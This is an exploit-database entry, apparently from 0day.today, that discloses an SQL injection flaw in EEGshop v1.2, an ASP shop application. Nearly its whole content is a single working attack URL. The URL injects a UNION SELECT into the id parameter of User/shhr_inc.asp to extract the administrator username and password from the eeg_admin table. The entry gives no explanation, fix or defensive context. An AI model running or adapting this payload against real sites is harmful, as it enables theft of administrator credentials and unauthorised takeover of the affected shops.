id: 10270
date: 12/15/2009
title: EEGshop v1.2 SQL Injection Vulnerability
author: Securitylab
cves: 

========================================
EEGshop v1.2 SQL Injection Vulnerability
========================================

######################################## ########################
# Application Info:
# Name: EEGshop
# Version: 1.2
########################################
#################################################################
#===========================================================
# http://servertx/User/shhr_inc.asp?action=edit&id=24%20and%201=2%20union%20select%201,2,username,password,5,6,7,8,9%20from%20eeg_admin%20where%20id=1
#===========================================================
#################################################################



#  0day.today [2023-03-25]  #